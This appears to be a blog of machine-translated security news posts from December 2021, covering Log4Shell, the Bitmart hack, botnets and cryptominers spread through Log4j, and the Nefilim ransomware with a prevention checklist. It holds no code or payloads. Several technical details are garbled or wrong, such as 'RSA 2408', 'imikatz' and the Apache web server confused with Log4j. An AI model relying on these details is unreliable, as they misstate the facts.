Friday, December 17, 2021

Famous Software Log4j Very Big Risk Realized in Minecraft

A security vulnerability has been found gaping due to a bug in the Log4j software. It is a very popular software because it is used by millions of web servers. The vulnerability is vulnerable to attack, and teams around the world are trying to cover systems that could be affected before malicious hackers can exploit them.

“The world of the internet is buzzing right now,” said Adam Meyers of cybersecurity firm Crowdstrike.

The problems with Log4j were first recognized in the video game Minecraft, and it was quickly realized that their impact was much broader. This software is used in millions of web applications, including by Apple's iCloud. According to Crowdstrike records, some of the attacks that have already started exploiting this bug are known as Log4Shell attacks, "and have been happening since last December 9th."

The director of the US Cybersecurity and Infrastructure Security Agency, Jen Easterly, said the security hole poses a "severe risk" to the internet. "This vulnerability, which is being widely exploited by certain actors who are creating threats, represents a very urgent challenge for defenders of this already widespread internet network," said Easterly.

The following are some points of explanation about the ongoing threat, quoted from NEW SCIENTIST Monday, December 13, 2021,

What is Log4j?

Almost all types of software used will keep a record of every error and other important records known as logs. So, instead of creating their own logging system, many software developers use open source Log4j, which makes it one of the most widely used logging packages in the world.

It is the popularity of the Log4j software that is now turning the heads of global cybersecurity experts. Its exposed security vulnerabilities impact the millions of pieces of software that are running on the millions of machines, with which we all interact.

What opportunities are given to hackers from the security gap that is open?

Attackers can trick Log4j's software into running malicious code by forcing it to save a log entry that includes a string of text. The way hackers do this varies from program to program. In the case found in Minecraft, the way is through the chat box. A log entry is created to archive each message so that if a string of malicious text is sent from one user to another, that text is embedded into the log.

In another case, Apple's servers were found to have created a log entry that recorded the names assigned to an iPhone by the user in the settings. From this log entry, attackers can run whatever code they want on the server, such as stealing or deleting sensitive data.

Why is this weakness only recently discovered?

The code that makes open source software can be seen, run and even edited by anyone. This transparency can make the software more robust and secure, because there are many pairs of eyes developing it. However, there is no software that can be guaranteed to be 100 percent safe.

The code that unlocks the Log4Shell attack has been around for a long time, but was only discovered last month by a cybersecurity researcher at Chinese computing firm Alibaba Cloud. The researcher immediately reported it to the Apache Software Foundation, a non-profit organization in America that oversees hundreds of open source projects including Log4j, to give him a chance to address them before they are made public.

So what is the current threat status?

Apache has given this vulnerability a 'very important' priority and has been rapidly developing a solution. Now, hundreds of thousands of IT teams are following update Log4j to version 2.15.0. IT teams also still have to clean their code of potential vulnerabilities and keep an eye on attempted hacks.

It's worth noting that a security patching solution might be quick to come by, but it usually takes time for everyone to apply. Computer and network services are also now very complex, layered with levels of abstraction, code, which makes it take months to be able to update all of their services.

And there are always those who don't want to do anything. Also outdated hardware, unupdated code, which hackers can easily exploit

Thursday, December 16, 2021

Crypto Merchant Cheated by Hackers, US$196 Million Token Taken Away

Cryptocurrency trader Bitmart was scammed by hackers. Blockchain security and data analysis company Peckshield estimates the value at US$196 million, equivalent to Rp. 2.8 trillion (assuming exchange rate: Rp. 14,300).

Meanwhile, Bitmart confirmed the hack in an official statement and wrote that the hacker withdrew about US$150 million in assets. This is adapted by detikcom from CNBC, Monday (6/12/2021).

Bitmart added in a statement that all withdrawals have been temporarily suspended until further notice, and it is reviewing security thoroughly.

Peckshield was the first to spot the irregularities on Saturday, noting that one of Bitmart's addresses showed steady outflows of tens of millions of dollars to an address Etherscan called "Bitmart Hackers."

Peckshield estimates that Bitmart lost around $100 million in various cryptocurrencies on the ethereum blockchain and another $96 million in coins on binance. The hackers escaped by stealing more than 20 tokens, including binance, safemoon, and shiba inu coins.

Read Also : Zoom Joins Facebook, Alphabet and Microsoft Against Terrorism

Bitmart said the affected ethereum and binance smart chain "hot wallets" carried only a small percentage of the exchange's assets. Bitmart says that all other wallets are safe.

CNBC has sought to reach out to several Bitmart employees to ask for more clarity about the hack, including whether customer funds were specifically targeted in the breach, and if so whether users would be compensated.

CNBC has yet to receive a response, but an email to the office address of Bitmart founder and CEO Sheldon Xia returned with a message that read, "Recipient address denied: Access denied."

Bitmart said it was still unclear what method the hackers might have used, but what happened after the breach was fairly straightforward, according to Peckshield. According to the security firm, it's a classic case of transfer-out, swap, and wash.

After transferring funds from Bitmart, the hacker apparently used a decentralized exchange aggregator known as '1inch' to exchange the stolen tokens for ether. From there, the ether coins are stored into a privacy mixer known as Tornado Cash which makes the money harder to track

Hackers Use Log4Shell Bug Roll Out Cyber Attacks Around The World

Used the Log4Shell vulnerability in Apache Log4j's Java-based logging platform to carry out potentially world-wide malware attacks.

Apache is a web server that can run on many operating systems, useful for serving and functioning websites. The protocol used to facilitate this web or www uses http.

The Bleeping Computer report says the Log4Shell vulnerability allows attackers to remotely execute commands on a vulnerable server, by searching for or converting the victim's browser into a special string.

Malicious actors can exploit the Log4Shell vulnerability to execute scripts that download and install various types of cryptominers.

Read Also : 5G Subscribers Expected to Reach 660 Million by End of 2021

Netlab 360 researchers report that the actor behind this threat exploited the vulnerability to install Mirai and Muhstik malware on affected devices.

This malware family also recruits IoT devices and servers into a botnet and uses them to deploy cryptominers and run large-scale DDoS attacks.

A report from Microsoft Threat Intelligence said the Log4j vulnerability was also used to exploit to bring down Cobalt Strike. Cobalt Strike is used to attack devices, to perform remote network surveillance or carry out further commands.

For this reason all users running servers on Log4j are requested to install the latest version of Log4j or the latest applications using Log4j as soon as possible

Nefilim Ransomware Successor to Nemty Ransomware

In 2020 many companies around the world fell victim to the “Nefilim” ransomware. One of them, the logistics and transportation company from Australia, Toll Group, which has an impact on its business operations.

The company is often used by e-commerce giants like eBay to transport bulk commodities, essential parts and medical supplies.

Reluctant to pay the demanded ransom, the Nefilim gang leaked the stolen 200 gigata (GB) data. The data is in the form of detailed employee information, including invoices for medical examination results and financial reports.

How do the Nephilim infect victims?

According to a Japanese cybersecurity company, Trend Micro, accessed on Wednesday (28 April 2021), Nefilim is one of the ransomware that uses double-attack extortion tactics, such as the Maze ransomware gang.

Nefilim not only encrypts the victim's computer data, but demands a ransom. If they refuse to pay the requested ransom, hackers threaten to release stolen company data.

The ransomware was first discovered in March 2020. Trend Micro believes it is an evolution of the “Nemty” ransomware because it has several similarities.

The Nephilim code has many important similarities with Nemty 2.5; the main difference is that Nefilim has removed the Ransomware-as-a-Service (RaaS) component. They also manage payments via email communications rather than through the Tor payments website.

For early access, Nefilim operators tend to take advantage of various ways to spread their malware. They exploit the Remote Desktop Protocol (RDP) vulnerability or the Citrix vulnerability (CVE-2019-19781) and use brute force attacks to infiltrate victim systems.

“Nefilim also uses other tools to collect credentials such as imikatz, LaZagne, and NirSoft's NetPass. Stolen credentials were used to reach the server," Trend Micro wrote.

After successfully entering the victim's system, the operator will start running its components, such as anti-antivirus, exfiltration tools, and finally Nefilim itself.

The hacker will use several legitimate tools for lateral movement—spreading on the victim's computer. For example, it uses PsExec or Windows Management Instrumentation (WMI), dropping and running other components, including the ransomware itself.

Nefilim was observed using batch files to terminate certain processes and services, even using third-party tools such as PC Hunter, Process Hacker, and Revo Uninstaller to terminate antivirus-related processes, services, and applications. This includes, using AdFind, BloodHound, or SMBTool to identify Active Directory and/or machines connected to the domain.

One of the most important aspects of Nefilim is its data exfiltration capabilities. Researchers observed Nefilim copying data from servers or shared directories to local directories and archiving them using 7-Zip. Then, it uses MEGAsync to extract the victim's data.

Meanwhile, to encrypt victim data, Nefilim uses AES-128. Then this AES encryption key will be re-encrypted using the RSA 2408 public key.

Therefore, to decrypt a locked file, it is necessary to obtain the attacker's RSA private key. For each encrypted file, Nefilim will add the .NEFILIM extension to the file name, as a file marker to all encrypted files, for example, a file named 1.doc will be named 1.doc.NEFILIM.”

According to the Indonesian National Cyber ​​and Crypto Agency (BSSN) after the exploitation process is complete, a ransom note file named NEFILIM-DECRYPT.txt will be generated by operators throughout the system. The file will contain instructions on how to contact the operator as well as data breach threats that put pressure on the victim if the ransom is not paid within seven days.

In fact, Nefilim operators provide links to websites that attackers use to leak victim data.

How to prevent the Nephilim?

The BSSN said, in some cyber incidents, Nefilim would be executed after the attacker managed to get into the victim's network. Furthermore, the attacker can retrieve the data.

If you become a victim of a Nefilim attack, BSSN recommends that the company does not pay the ransom because the attacker will still have access to the data even if the company pays the ransom.

If you become a victim of a Nefilim attack, BSSN advises that the company does not pay the ransom because the attacker will still have access to the data even if the company pays the ransom.

Here are some steps that can be used as an effort to prevent Nefilim ransomware:

  1. Close unused RDP ports. If it is not possible to close it, limit the source addresses that can access the port.
  2. Configure the settings to ensure that only authorized users can gain access as RDP admins. For RDP administrator accounts, use a strong password and multi-factor authentication (MFA).
  3. Perform network monitoring for signs of an attack.
  4. Limit the number of failed login attempts to prevent unauthorized logins.
  5. Use spam filters and antivirus to detect and filter out malicious emails.
  6. Always make sure your computer gets the latest patches and updates.
  7. Scan your computer using an antivirus with the latest updates.
  8. Always enable the firewall on the computer.
  9. Back up data periodically by backing up on external storage media.
  10. Turn off file sharing if not needed. If file sharing is required, we recommend using ACLs and passwords to restrict access. Disable anonymous access for shared folders.
  11. Do not open suspicious emails and be aware of any links received.
  12. Do not download or use crack software and illegal software.
  13. Be careful with external devices connected to the computer and when installing free programs downloaded on the internet